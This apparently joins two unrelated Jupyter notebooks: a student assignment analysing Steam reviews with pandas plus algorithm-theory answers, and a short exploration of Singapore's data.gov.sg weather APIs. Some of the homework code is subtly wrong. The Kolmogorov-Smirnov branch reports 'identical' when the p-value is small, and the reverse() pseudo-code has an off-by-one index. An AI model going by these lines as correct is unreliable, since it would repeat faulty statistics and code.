We have decided to make a barplot in which we have counted the number of reviews for the first 50 applications. We have decided 50 because it have seemed to us a good tradeoff to have a clean representation a pick the more reviewed games
```
number_review = dataset.groupby("app_name").review_id.count().sort_values(ascending=False)
number_review[0:50].plot.bar(figsize = (18, 7), title=' Number of review', xlabel='Name of application',
ylabel='Number of review', color = "coral", logy = True)
plt.show()
# for a visual table to have an idea of how many reviews for the first 50 apps
number_review.reset_index().head(50)
```
### What applications have the best Weighted Vote Score?
Each review has a **Weighted Vote Score** that represents the helpfuness score of that review. To extract the weighted vote score for each game we have computed the mean between all the vote for each application. In this way we have an idea about what applications have received the most helpfulness reviews. Then we have decided to select only average votes above 0.3 because we have considered it a good threshold for the best votes.
```
medie = pd.DataFrame(dataset.groupby("app_name").weighted_vote_score.mean().sort_values(ascending=False))
medie = medie[medie.values > 0.3]
medie
```
### Which applications have the most and the least recommendations
In this point, we thought that for most and least recommended apps, the percentage values where the ones to be aware of, meaning that an app was the most recommended if it has the higher percentage value of the most recommended reviews
```
#Most
# recommended. group_by app_name. count all recommended,
# count True recommended and False recommended in separate cols, and percentage of these.
# taking only the useful cols
new_data = dataset[['app_name', 'recommended']]
# count_rec col counts all recommended respectively False and True of an application
new_data['count_rec'] = new_data.groupby(['app_name', 'recommended'], sort=False)['recommended'].transform('count')
# all_rec col counts all recommedations, False and True together
new_data['all_rec'] = new_data.groupby("app_name", sort=False)['count_rec'].transform('count')
# final dataframe which contains only the True recommendations
# this means that we can calculate the most and the least recommended apps
final = new_data[(new_data['recommended']==True)].drop_duplicates()
# perc_rec calculates the percentage recommendation
final['perc_rec'] = (final['count_rec']/final['all_rec'])*100
# drop not useful cols
final.drop(['recommended', 'count_rec'], axis=1, inplace=True)
# most recommended, first 50
final.sort_values(by='perc_rec', ascending=False).reset_index(drop=True).head(50)
```
We can see that the most recommended apps are not the one with the higher reviews
```
# least recommended, first 50
final.sort_values(by='perc_rec', ascending=True).reset_index(drop=True).head(50)
```
### How many of these applications were purchased, and how many were given for free?
```
# steam_purchase
# taking only the useful cols
new_data1 = dataset[['app_name', 'steam_purchase']]
# same modus operandi of counting recommendation
new_data1['count_pur'] = new_data1.groupby(['app_name', 'steam_purchase'], sort=False)['steam_purchase'].transform('count')
# taking only the ones purchased
final1 = new_data1[(new_data1['steam_purchase']==True)].drop_duplicates()
# drop not useful col
final1.drop(['steam_purchase'], axis=1, inplace=True)
# received_for_free
# taking only the useful cols
new_data2 = dataset[['app_name', 'received_for_free']]
# same modus operandi
new_data2['count_free'] = new_data2.groupby(['app_name', 'received_for_free'], sort=False)['received_for_free'].transform('count')
# take only the ones received_for_free
final2 = new_data2[(new_data2['received_for_free']==True)].drop_duplicates()
# drop not useful col
final2.drop(['received_for_free'], axis=1, inplace=True)
# now it's time to calculate the final result, by doing a merge of the final dataframes
dfs = [final, final1, final2]
final_df = reduce(lambda left,right: pd.merge(left,right,on=['app_name'],
how='outer'), dfs)
# taking the first 40 apps that are most recommended and displaying how many times were
# purchased and how many times were received for free
final_df.sort_values(by='perc_rec', ascending=False).head(40)
# least recommended
final_df.sort_values(by='perc_rec').head(40)
```
# RQ 3
### What is the most common time that authors review an application? For example, authors usually write a review at 17:44.
First of all, we take only the `timestamp_created` col and we convert in `string` the time values. Next, with a simple dictionary and a `for` cycle, we count the occurrences of every single time (HH:MM) and at the end we return only the most common time.
```
# first point
# taking only the timestamp_created col
timestamp_col = np.array(dataset["timestamp_created"].dt.time.astype('str'))
dict_time = {}
for time in timestamp_col:
# taking only hour and minute
new_time = time[:5]
if new_time not in list(dict_time.keys()):
dict_time[new_time] = 1
else:
dict_time[new_time] += 1
# sorting the dictionary in descending order
dict_time_sorted = {k: v for k, v in sorted(dict_time.items(), key=lambda item: item[1], reverse=True)}
# returning the most common time (without seconds)
next(iter(dict_time_sorted))
```
### Create a function that receives as a parameter a list of time intervals and returns the plot the number of reviews for each of the intervals.
Using the function **orario** we can extract for a given list of time interval the number of reviews written in each time interval
### Use the function that you created in the previous literal to plot the number of reviews between the following time intervals:
```
intervalli = ['06:00:00', '10:59:59', '11:00:00', '13:59:59', '14:00:00', '16:59:59',
'17:00:00', '19:59:59', '20:00:00', '23:59:59', '00:00:00', '02:59:59', '03:00:00',
'05:59:59']
functions.orario(intervalli)
```
On the x-axis for each bar is indicated the starting point of the time interval. We have observed that fewer people have written reviews during the night while the majority of people have written their reviews in the first hours of the morning and in the dinner hours
# RQ4
### What are the top 3 languages used to review applications?
```
top_languages = pd.DataFrame(dataset.groupby("language").review_id.count().sort_values(ascending=False).head(3))
top_languages
```
As expected the majority of the reviews are written in english, chinese and russian!
```
top_languages = list(top_languages.index)
top_languages
```
### Create a function that receives as parameters both the name of a data set and a list of languages’ names and returns a data frame filtered only with the reviews written in the provided languages.
There we have used the function **get_reviews_by_languages** to accomplish a dataframe where there are only reviews written in the top 3 languages
```
dataset_filter = functions.get_reviews_by_languages(dataset, top_languages)
```
### Use the function created in the previous literal to find what percentage of these reviews (associated with the top 3 languages) were voted as funny?
For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one funny vote and then we have computed the ratio between them and all the reviews written in that language.
To compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**
```
numeratore_1 = []
denominatore_1 = []
rapporto_1 = []
for i in range(len(top_languages)):
numeratore_1.append(dataset_filter.loc[(dataset_filter.votes_funny != 0) & (dataset_filter.language == top_languages[i])].votes_funny.count())
denominatore_1.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_funny.count())
rapporto_1.append(round((numeratore_1[i]/denominatore_1[i])*100, 2))
print("The percentage of reviews written in " + '\033[1m' + top_languages[i] +'\033[0m' +
" that has received at least a funny vote is " +
'\033[1m' + str(rapporto_1[i]) + "%" + '\033[0m')
```
At this point we have also wanted to compute the percentage of reviews that have received at least a funny vote among all these three languages.
```
# same as above
print("The percentage of reviews written in one of the top 3 language that has received at "
"least a funny vote is " + '\033[1m' + str(round((sum(numeratore_1)/sum(denominatore_1))*100, 2)) + "%" + '\033[0m')
```
### Use the function created in the literal “a” to find what percentage of these reviews (associated with the top 3 languages) were voted as helpful?
For this request we have used the new filtered dataset and for each language we have selected the reviews that have received at least one helpful vote and then we have computed the ratio between them and all the reviews written in that language.
To compute this percentage we have used **dataset_filter** that is the new dataframe obtained using the previous function **filtro**
```
numeratore_2 = []
denominatore_2 = []
rapporto_2 = []
for i in range(len(top_languages)):
numeratore_2.append(dataset_filter.loc[(dataset_filter.votes_helpful != 0) & (dataset_filter.language == top_languages[i])].votes_helpful.count())
denominatore_2.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_helpful.count())
rapporto_2.append(round((numeratore_2[i]/denominatore_2[i])*100, 2))
print("The percentage of reviews written in " + '\033[1m' + top_languages[i] + '\033[0m' +
" that has received at least a helpful vote is " +
'\033[1m' + str(rapporto_2[i]) + "%" + '\033[0m')
```
At this point we have also wanted to compute the percentage of reviews that have received at least a helpful vote among all these three languages.
```
# same as above
print("The percentage of reviews written in one of the top 3 language that has received at "
"least a helpful vote is " + '\033[1m' + str(round((sum(numeratore_2)/sum(denominatore_2))*100, 2)) + "%" + '\033[0m')
```
# RQ5
### Plot the top 10 most popular reviewers and the number of reviews.
```
num_reviewers = dataset['author.steamid'].value_counts().head(10)
num_reviewers.plot(kind='bar',
xlabel='TOP 10 reviewers',
ylabel='number of reviews')
```
### What applications did the most popular author review?
At first, we took the previous result of the most popular author to leave only the rows of the reviews written by him/her, and then we returned all the applications reviewed by this author.
```
num_rev = pd.DataFrame({'reviewers':num_reviewers.index, 'num_reviews':num_reviewers.values})
pop_auth = num_rev['reviewers'][0]
apps_rev = dataset[dataset['author.steamid'] == pop_auth].app_name
app_name_rev = list(apps_rev.values)
app_name_rev = [el for el, count in Counter(app_name_rev).items()]
print(app_name_rev)
```
### How many applications did he/she purchase, and how many did he/she get as free? Provide the number (count) and the percentage.
```
# taking only the steam_purchase and received_for_free apps of the author
app_count = dataset[dataset['author.steamid'] == pop_auth][['steam_purchase', 'received_for_free']]
# how many app did the author reviewed
tot_app_rev = len(app_count.index)
purchased = dict(Counter(app_count['steam_purchase']))
free_apps = dict(Counter(app_count['received_for_free']))
purchased[True] = [purchased[True], "{:.2%}".format(purchased[True]/tot_app_rev)]
purchased[False] = [purchased[False], "{:.2%}".format(purchased[False]/tot_app_rev)]
free_apps[True] = [free_apps[True], "{:.2%}".format(free_apps[True]/tot_app_rev)]
free_apps[False] = [free_apps[False], "{:.2%}".format(free_apps[False]/tot_app_rev)]
purch_df = pd.DataFrame(purchased, index=['count', 'Percentage']).T
free_df = pd.DataFrame(free_apps, index=['count', 'Percentage']).T
purch_df.index.name = 'App Purchased'
free_df.index.name = 'App given Free'
purch_df
```
`True` means that the apps were purchased, `False` doesn't.
```
free_df
```
`True` means that the apps were given for free, `False` doesn't.
There is a significant difference between the purchased and the free apps: the first ones were mostly purchased on Steam, and the latter only 4 apps were given for free, then this means that not every app that the author reviewed was purchased on Steam, because if we assume that all the purchased apps are counted also in the "not given for free" ones, then we have 35 apps purchased somewhere else, and counting also the 4 apps given for free, we have all the apps not purchased on Steam, which are 39.
### How many of the applications he/she purchased reviewed positively, and how many negatively? How about the applications he received for free?
```
# have to use the recommended col
app_recomm = dataset.loc[(dataset['author.steamid'] == pop_auth) & (dataset['recommended'] == True)][['steam_purchase', 'received_for_free']]
purchased_rec = dict(Counter(app_recomm['steam_purchase']))
free_apps_rec = dict(Counter(app_recomm['received_for_free']))
tot_app_rec = len(app_recomm.index)
print('{} applications purchased were reviewed positively, and {} were reviewed negatively'
.format(purchased_rec[True], purchased_rec[False]))
print('{} applications given for free were reviewed positively, and {} were reviewed negatively'
.format(free_apps_rec[True], free_apps_rec[False]))
```
Comparing these results with the ones in the previous question, we can see that 3 apps were not recommended positively nor negatively, and those are, using the same hypothesis of the previous answer, 2 purchased on Steam and 1 purchased elsewhere. Also we can see that all apps given for free where recommended positively, which means that the author liked playing with them (and we assume that he/she also liked their quality of being "free")
# RQ6
### What is the average time (days and minutes) a user lets pass before he updates a review?
Just to start we have computed the difference between the time when the review is written and time when the review is updated and then we have transformed this difference in terms of days
```
dataset['difference_days'] = (dataset['timestamp_updated'] - dataset['timestamp_created'])
dataset['difference_days'] = dataset['difference_days']/np.timedelta64(1,'D')
```
After that we have deleted who did not update his review because we have thought that is meaningless consider them. Then we have computed the mean between days and the integer part of this number represents the average number of days after an author updates his review. Instead to transform the decimal part in minutes we have to multiply it for 1440 because in one day there are 1440 minutes. We have made a simple proportion: *1 : 1440 = x : (decimal part of our number)*
```
dataset_1 = dataset[dataset.difference_days != 0]
average = dataset_1.difference_days.mean()
minutes = round((average % 1) * 1440, 0)
days = average // 1
print("The average time a user lets pass before he updates a review is "+
'\033[1m' + str(days) + '\033[0m' + " days and " + '\033[1m' + str(minutes) + '\033[0m' + " minutes")
```
On average an author updates his review almost after a year!
### Plot the top 3 authors that usually update their reviews.
We have used the dataframe **dataset_1** in which there are only the reviews that have been updated. We did not use the starting dataset because we have to extract who are the authors that usually update their reviews so authors that have updated more reviews through time.
```
a = pd.Series(dataset_1.groupby('author.steamid').review_id.count().sort_values(ascending=False).head(3))
a
#bar plot
plt.figure(figsize=(12, 8))
ax = a.plot(kind="bar", color = ["orchid", "orange", "green"], alpha=0.75, rot=0)
ax.set_title("TOP 3 authors that have updated more reviews")
ax.set_xlabel("Steam ID")
ax.set_ylabel("Number of reviews updated")
#needed to put values on top of the bar
for i, v in enumerate(a.values):
ax.text(i, v+1, str(v), color='black', fontweight='bold')
```
We have put the number of reviews over the bars because the second and the third author have updated almost the same number of reviews.
# RQ7
### What’s the probability that a review has a Weighted Vote Score equal to or bigger than 0.5?
We have used the definition of probability to compute these values indeed we have count the number of reviews that has a Weighted Vote Score equal to or bigger than 0.5 and this number represents the favourable case (we have stored this number in **casi_fav**)while the number of total case is represented by the number of the lines of our dataset, stored in **casi_tot**. The probability is the ratio between them.
```
#filter the dataset picking only weighted_vote_score >= 0.5
#and count the rows of filter dataset
casi_fav = dataset[dataset.weighted_vote_score >= 0.5].weighted_vote_score.count()
#number of rows of initial dataset
casi_tot = dataset.weighted_vote_score.count()
result_1 = round(casi_fav/casi_tot, 2)
print("The probability is of a review has a Weighted Vote Score equal to or bigger than 0.5 is "+ '\033[1m' +str(result_1)+'\033[0m')
```
### What’s the probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5?
We want to compute this conditional probability P(B|A) where B is the event: *a review has at least one vote as funny*. The sample space will be reduced, indeed we have filtered the dataset in such way that we are going to look for reviews with at least one vote as funny just among reviews with Weighted Vote Score is bigger than 0.5.
```
#new sample space: filter dataset like before
# A
dataset_prob = dataset[dataset.weighted_vote_score > 0.5]
#count the reviews with at least a funny vote in the new filter dataset
#B intersect A
casi_fav_2 = dataset_prob[dataset_prob.votes_funny != 0].votes_funny.count()
#A
casi_tot2 = dataset_prob.weighted_vote_score.count()
#P(B|A)
result_2 = round(casi_fav_2/casi_tot2, 2)
print("The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is ",'\033[1m' +str(result_2)+'\033[0m')
```
### Is the probability that “a review has at least one vote as funny” independent of the “probability that a review has a Weighted Vote Score equal or bigger than 0.5"?
To be independent these two events it would happen that the probability of the event B: *a review has at least one vote as funny* would be equal to *probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5, that is P(B|A);* because in this way the conditioning of the two probability is useless given that they are independent.
To be independent these two events it would happen that the P(B) would be equal to P(B|A) because in this way the conditioning of the two probability is useless given that they are independent: P(B|A) = P(B).
```
#P(B|A)
casi_fav_ba = dataset[(dataset.weighted_vote_score >= 0.5) & (dataset.votes_funny != 0)].votes_funny.count()
result_3a = round(casi_fav_ba/casi_fav, 2)
print("The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is ",'\033[1m' +str(result_3a)+'\033[0m')
#count the reviews with at least a funny vote in the starting dataset
#B
casi_fav_3 = dataset[dataset.votes_funny != 0].votes_funny.count()
#P(B)
result_3 = round(casi_fav_3/casi_tot,2)
print("The probability of a review has at least one vote as funny is "+ '\033[1m' +str(result_3)+'\033[0m')
```
0.12 is different from 0.25 so these two events are **dependent!**
# RQ8
### Is there a significant difference in the Weighted Vote Score of reviews made in Chinese vs the ones made in Russian? Use an appropriate statistical test or technique and support your choice.
We'll use a non-parametric(Kolgomoronov-Smirnov) test in order to find if the 2 distribution are the same(comes from the same population) or not, since the 2 distributions are not normally distributed
```
data_lang = functions.get_reviews_by_languages(dataset,["schinese","russian"])
```
First at all we compare chinese weighted score distribution and russian weighted score distribution using histograms. At first glance there does not seem to be any significant differences between the two distribution. From this plot those 2 distributions seems that distributes equally.
```
plt.figure(figsize = (10,8))
data_lang[data_lang.language == "schinese"].weighted_vote_score.plot(kind = "hist", label = "Chinese",alpha = 0.3)
data_lang[data_lang.language == "russian"].weighted_vote_score.plot(kind = "hist", label = "Russian", color = "orange",alpha = 0.3)
plt.legend()
```
So we can support the choice with a statistaical test.Let's check with the KS test
```
k_smir_test = ks_2samp(data_lang[data_lang.language == "schinese"].weighted_vote_score,
data_lang[data_lang.language == "russian"].weighted_vote_score)
if k_smir_test.pvalue <= 0.1:
print("the two distributions are identical.")
else:
print(f"the 2 distributions are different with a pvalue of {k_smir_test.pvalue}")
```
The Kolmogorov-Smirnov test is a non-parametric test that checks the shape of sample distributions. It can be used to compare two samples and It does not in itself require any assumptions about the sample distribution, like in our case. The acceptance of the H0 hypothesis predicts that the two distributions belong to the same population.
### Can you find any significant relationship between the time that a user lets pass before he updates the review and the Weighted Vote Score? Use an appropriate statistical test or technique and support your choice.
We'll discover if there is a relationship into 3 step:
* plot
* pearson correlations
* Linear Regression
```
# step 1: plot
plt.figure(figsize = (10,8))
plt.scatter(dataset.difference_days, dataset.weighted_vote_score)
print("no relationship visible")
# step 2: pearson correlation
print(pearsonr(dataset.difference_days, dataset.weighted_vote_score))
print("no relations detected ")
X = dataset[["difference_days"]]
X = sm.add_constant(X).values
model = sm.OLS(dataset.weighted_vote_score, X)
res = model.fit()
res.summary()
```
using Simple Linear Regression (1 X variable) is the same that using pearsonr because
$R^{2}Score = (pearsonr)^2 $
```
p = pearsonr(dataset.difference_days, dataset.weighted_vote_score)
print(f"pearsonr {p[0]}\npearsonr^2 = {p[0]**2} -> same as R-squared detected above")
```
The second test is linear regression: also in this case there is no evidence that between two variables there is a sort of correlation.
### Is there any change in the relationship of the variables mentioned in the previous literal if you include whether an application is recommended or not in the review? Use an appropriate statistical test or technique and support your choice.
just adding another variable into Linear Regression
```
X = dataset[["difference_days","recommended","weighted_vote_score"]].astype({"recommended":int})
model = smf.ols("weighted_vote_score ~ difference_days + C(recommended)", data=X)
res = model.fit()
res.summary()
```
no changes in relationships
### What are histograms, bar plots, scatterplots and pie charts used for?
Histogram: This type of data visualization helps to interpret univariate analysis results. Simply put, it shows where data points are dense and where they are sparse in one dimension. However, instead of comparing the categorical data, it breaks down a numeric data into interval groups and shows the frequency of data fall into each group. Histogram is good at identifying the pattern of data distribution on a numeric spectrum.
Bar Chart: Bar chart compares the measure of categorical dimension. Bar chart is very similar to a histogram. The fundamental difference is that the x-axis of bar charts is categorical attribute instead of numeric interval in the histogram. Furthermore, bar chart is not just limited to plot one categorical data. An extension of bar chart, clustered bar chart (or group bar chart) compares two categorical attributes.
Scatterplot: It plots one numeric attribute against another numeric attribute and visualizes the correlation between axes. Scatter plot is commonly applied to identify regression type of relationships such as linear regression, logistic regression etc. It also provides a robust analysis of the correlation significance. We can estimate that the correlation relationship is stronger,linearly, when the data points lying on a line with a certaing degree, whereas the relationship is weak if the line is flat.
Piechart: It is used to represent the percentage and weight of components belonging to one categorical attribute. The size of the pie slice is proportional to the percentage, hence it intuitively depicts how much each component occupies the whole.
### What insights can you extract from a Box Plot?
A boxplot shows the distribution of the data with more detailed information. from Box Plot we can "extract" information such as outliers, maximum, minimum, first quartile(Q1), third quartile(Q3), interquartile range(IQR), and median. It also gives you the information about the skewness of the data, how tightly closed the data is and the spread of the data.
# TQ1
## Question 1
As known, given a random variable $X$, the Quantile function *Q($\cdot$)* with support $\{ p | p \in [0,1] \}$ is the function that computes:
\begin{equation}
Q(p)=s \hspace{0.2 cm} |\hspace{0.2 cm} \mathcal{P}(X<=s) = p
\end{equation}
Denoting with $A_i$ the i-th element of the vector $A$ of length $n$ and given $k \in [0,n]$, it is possible to see that our algorithm compute:<br>
\begin{equation}
alg(A,k)=s \hspace{0.2 cm} |\hspace{0.2 cm} \#\{A_i<=s\} = k
\end{equation}
It is then easily possible to perform some trasformations over our algorithm parameters in order to obtain the similarities with the quantile function, i.e.:
1. A shrinkage over our algorithm support space (i.e. $k'=k/n$);
2. A shrinkage over our cardinality measure (i.e. $\#\{A_i<=s \}'=\frac{\#\{A_i<=s \}}{n}$);
Substituting into our $alg(A,k)$ it becomes:
\begin{equation}
alg(A,k')=s\hspace{0.2 cm} |\hspace{0.2 cm} \frac{\#\{A_i<=s\}}{n} = k'
\end{equation}
In a frequentist approach (said $A_r$ a random sample of the vector $A$) we can equal $\frac{\#\{A_i<=s\}}{n}= \mathcal{P}(A_r <= s)$; In words, our algorithm is computing the value $s$ so that the number of elements in the array $A$ smaller or equal to $s$ will be equal to $k$: we can so somehow define our algorithm a "quantile function over a non-normalized support".
## Question 2
We initially note that the subdivision of the array $A$ (over which we are calling $alg()$) into $L$ and $R$ requires to scan the whole vector $A$ (i.e. requires $n=len(A)$ operations). Let consider the worst case scenario, i.e. imagine that $k=n$ and that at each iteration the random sample $s$ will always be equal to $A_1$: it basically means that the $s$ satisfying the condition over $k$ will be selected at the $n_{th}-1$ call of $alg()$ (iteration at which the vector $A$ over which we are calling $alg()$ has lenght equal to 2). We are so going to remove at each call of $alg()$ a single element, i.e. the smallest element in $A$. Due to this, the number of operations needed to scan the vector $A$ will decrease of one unit at each iteration of $alg()$. So we have that:
$$
T(n)=n+(n-1)+(n-2)+(n-3)+...+(n-(n-1)) = \sum_{i=0}^{i=n-1}(n-i)=\frac{1}{2}n(n-1)
$$
(We recall that the sum is executed over $n-1$ iteration because we need $n-1$ call of $alg()$ to reach the right $s$). We can so assume an asymptotical complexity in the worst case scenario (removing costant therms) equal to $\mathcal{O}(n^2)$.
## Question 3
In the best case scenario, the right $s$ will be picked up at the first iteration: we only need $n$=len($A$) operation to scan $A$ and divide it into $L$ and $R$ : the asymptotical complexity will then be equal to $\mathcal{O}(n)$.
# TQ2
## Question 1
Let dive into the interpretation of the given recursive algorithm's complexity. It is clear that, given a particular $n$ and $\forall l$, and expressing with $T(n)$ the time needed to complete the algorithm called with parameter $n$:
\begin{equation}
T(n) = T\left(\frac{n}{2}\right)\cdot 2 + \left(\frac{n}{2}+1\right)\cdot 3
\end{equation}
Indeed, calling **splitSwap(a,l,n)** we will have to solve two times **splitSwap(a,l,n/2)** plus execute 3 operations for each of the $\left(\frac{n}{2}+1\right)$ iterations of the for loop into **swapList(a,l,n)**. Lets compute running times after the expression of $T(n)$:
\begin{equation}
T\left(\frac{n}{2}\right) = T\left(\frac{n}{2^2}\right)\cdot 2 + \left(\frac{n}{2^2}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^2}\right)\cdot 2^2 + \left(\frac{n}{2^2}+1\right)\cdot2 \cdot 3 +\left(\frac{n}{2}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^2}\right)\cdot 2^2 + \left(\frac{n}{2}+1\right)\cdot2 \cdot 3 +3
\end{equation}
\begin{equation}
T\left(\frac{n}{2^2}\right) = T\left(\frac{n}{2^3}\right)\cdot 2 + \left(\frac{n}{2^3}+1\right)\cdot 3
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^3}\right)\cdot 2^3 + \left(\frac{n}{2}+1\right)\cdot 3 \cdot 3 +7
\end{equation}
\begin{equation}
T(n) = T\left(\frac{n}{2^k}\right)\cdot 2^k + \left(\frac{n}{2}+1\right)\cdot k \cdot 3 +log_2(2^k)-1
\end{equation}
Setting $2^k=n \Leftrightarrow k =log_2(n)$ we obtain:
\begin{equation}
T(n) = T(1)\cdot n + \left(\frac{n}{2}+1\right)\cdot log_2(n) \cdot 3 +log_2(n)-1 \simeq n\cdot log_2(n)
\end{equation}
In the latter we have removed the dependency from factors, constant terms and considered only the term with the biggest growth rate w.r.t $n$. We can than say that the asymptotical complexity of the algorithm is $\mathcal{O}(n\cdot log_2(n))$.
## Question 2
Given an array **a**, an index **l** and a number **n** (considering the scenario where both **len(a)** and **n** are power of 2 numbers), the algorithm output the array **a'** built as follows:
\begin{equation}
a'[i]=a[i] \hspace{1cm}\forall i \in [0,1,...,l-1]\hspace{1cm}\mbox{if}\hspace{1cm} l \geq 1
\end{equation}
\begin{equation}
a'[l+i]=a[l+n-i]
\end{equation}
In words, starting from an index **l** of the original array **a**, the algorithm is reversing the position of the first **n** elements of the array. Because of this of course it is required that **l+n** $\leq$ **len(a)**, otherwise the subroutine **swapList()** will raise an error because of the out-of-range index it loops on. Let describe the algorithm's mechanism. Looking at the code, we can assess how the only part of the code actually changing the position of the array's elements is the subroutine **swapList()**. Given a triplet **(a,l,n)**, once **splitSwap()** is called, it will recursively call himself with an **n** halfed call by call (i.e. **n**$^{(1)}$ =**n/2**, **n**$^{(2)}$ =**n**$^{(1)}/2$, **n**$^{(3)}$ =**n**$^{(2)}/2$ and so on). As we can see in the (Fig.1), after $\text{log}_2(n)-1$ steps, the function **splitSwap(a,l,2)** will be called: in its execution both **splitSwap(a,l,1)** and **splitSwap(a,l+1,1)** will **return** (being **n**=1), finally allowing the execution of **swaplist(a,l,2)** (that we will call **final-node-subroutine** $\forall l$) that will exchange the position of the array's elements **a[l]** with **a[l+1]**. Being **splitSwap(a,l,2)** completed, **splitSwap(a,l+2,2)** will be called. Similary, at the end of the execution its **final-node-subroutine** will exchange the position of the array's elements **a[l+2]** with **a[l+3]**. Basically the **final-node-subroutines** consider the array (starting from the element $a[l]$) as a sequence of $\frac{n}{2}$ couples of elements and in each couple they exchange the 1st element with the 2nd one.
Recalling that **splitSwap(a,l,2)** and **splitSwap(a,l+2,2)** where called in **splitSwap(a,l,4)**, **swapList(a,l,4)** (that we will call **semi-final-node-subroutine**) will finally be executed, exchanging the position of the array's elements **a[l]** with **a[l+2]** and **a[l+1]** with **a[l+3]**. So the role of **semi-final-node-subroutines** is to consider the array (starting from the element $a[l]$) as a sequence of $\frac{n}{4}$ couples of couples and to exchange the position of the 1st element of the 1st couple with the 1st element of the 2nd couple, and the 2nd element of the 1st couple with the 2nd element of the 2nd couple. Basically, after the execution of all the **final-node-subroutines** and of the **semi-final-node-subroutines** the position of the 1st group of 4 elements of the original array will be reversed, the same for the 2nd group of 4 elements and so on. We can so climb our recursive function tree from the **final-node-subroutines** up to the top **first-final-node-subroutine** i.e. **swapList(a,l,n)**. We can see the effect of each kind of **subroutine** level over a test array in two examples at (Fig.2,3) recalling that the output of the **first-final-node-subroutine** will be equal to the algorithm's output.
Having assessed that the algorithm complexity is $\simeq O(n\cdot log_2(n))$, it is possible to confirm that the algorithm it's not optimal: infact it is easily possible to write some pseudo-code with a lower complexity than the given algorithm:
```python
def reverse(a,l,n):
reversed_array=a
for i in range(n):
reversed_array[i+l]=a[l+n-i]
return reversed_array
```
We can easily see that the **reverse()** algorithm complexity has now become (removing costant therms and factors) $O(n)$, proving that the **splitSwap()** algorithm was not optimal.
In order:<br>
Fig.1 :Reaching the first final-node-subroutine<br>
Fig.2 :Test over a with len(a)=n=16, l=0<br>
Fig.3 :Test over a with len(a)=16, n=8, l=7<br>

<figcaption align="center"> Fig.1 :Reaching the first final-node-subroutine</figcaption>
=n=16, l=0")
<figcaption align="center"> Fig.2 :Test over a with len(a)=n=16, l=0</figcaption>
=16, n=8, l=7")
<figcaption align="center"> Fig.3 :Test over a with len(a)=16, n=8, l=7</figcaption>
# TQ3: Knapsack
In this theoretical question we have to face with a NP-complete problem: the Knapsack one. To solve it generally we have to use heuristic solutions but in some cases they fail to provide the optimal solution.
* The first heuristic solution is a greedy algorithm in which we order the object in increasing order of weight and then visit them sequentially, adding them to the solution as long as the budget is not exceeded. This algorithm does not provide the optimal solution in every situation indeed in my counterexample this greedy algorithm fails: we fix the budget: **W** = 10 and we have three object.
|i |w_i| v_i|
|-----|---|----|
|1 |4 |3 |
|2 |6 |5 |
|3 |10 |9 |
We have to visit the object sequentially so we are going to pick the first two objects, but we cannot pick the third one because we will exceed the budget. This choice is not optimal because it would be better pick only the third object because its values (9) is greater of the sum of the first two (8).
* In the second heuristic solution we have to order the objects in decreasing order of values, and then visit them sequentially, adding them to the solution if the budget is not exceeded. This algorithm does not provide the optimal solution in each situation indeed in my counterexample this greedy algorithm fails: I have decided to choose the same budget **W** = 10 and the same number of object of the last counterexample.
|i |w_i| v_i|
|-----|---|----|
|1 |9 |9 |
|2 |7 |7 |
|3 |3 |3 |
We have to visit the objects sequentially so we are going to pick the first object, but we cannot pick the last two because we will exceed the budget. This choice is not optimal because it would be better pick the second and the third objects because the sum of their values (10) is greater of the first object value (9).
* In the third heuristic solution we have to order them in decreasing relative value ($v_1$/ $w_i$), and then visit them sequentially, adding them to the solution if the budget is not exceeded
This algorithm does not provide the optimal solution in each situation indeed in my counterexample this greedy algorithm fails: I have decided to choose the same budget **W** = 10 and the same number of object of the two last counterexamples.
|i |w_i| v_i|
|-----|---|----|
|1 |7 |9 |
|2 |6 |6 |
|3 |4 |4 |
We have to visit the objects sequentially so we are going to pick the first object whose relative value is 1.29 while the one of the other objects is 1. We cannot pick the last two because we will exceed the budget. This choice is not optimal because it would be better pick the second and the third objects because the sum of their values (10) is greater of the first object value (9).
|
github_jupyter
|
# explore_data_gov_sg_api
## Purpose:
Explore the weather-related APIs at https://developers.data.gov.sg.
## History:
- 2017-05 - Benjamin S. Grandey
- 2017-05-29 - Moving from atmos-scripts repository to access-data-gov-sg repository, and renaming from data_gov_sg_explore.ipynb to explore_data_gov_sg_api.ipynb.
```
import matplotlib.pyplot as plt
import pandas as pd
import requests
import seaborn as sns
%matplotlib inline
# Get my API keys
from my_api_keys import my_api_dict
# Note: this module, containing my API keys, will not be shared via GitHub
# You can obtain your own API key(s) by registering at https://developers.data.gov.sg
my_key = my_api_dict['data.gov.sg'] # API key for data.gov.sg
```
## Meta-data for available meteorological APIs
[I added this section after exploring the wind-speed data - see below.]
```
# Meteorological variables
for variable in ['rainfall', 'wind-speed', 'wind-direction', 'air-temperature', 'relative-humidity']:
print(variable)
r = requests.get('https://api.data.gov.sg/v1/environment/{}'.format(variable),
headers={'api-key': my_key})
metadata = r.json()['metadata']
for key in metadata.keys():
if key != 'stations': # don't print information about stations
print(' {}: {}'.format(key, r.json()['metadata'][key]))
# 1hr PM2.5 data are also available
r = requests.get('https://api.data.gov.sg/v1/environment/{}'.format('pm25'),
headers={'api-key': my_key})
r.json()
```
## Wind-speed
```
# Query without specifying date_time - returns most recent data?
!date
r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
headers={'api-key': my_key})
r.json()
# Re-organize data into DataFrame
df = pd.DataFrame(r.json()['items'][0]['readings'])
df = df.rename(columns={'value': 'wind-speed'})
df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
df
# Get wind-speed for specific time in past
r = requests.get('https://api.data.gov.sg/v1/environment/wind-speed',
headers={'api-key': my_key},
params={'date_time': '2016-12-10T00:00:00'})
df = pd.DataFrame(r.json()['items'][0]['readings'])
df = df.rename(columns={'value': 'wind-speed'})
df['timestamp (SGT)'] = pd.to_datetime(r.json()['items'][0]['timestamp'].split('+')[0])
df
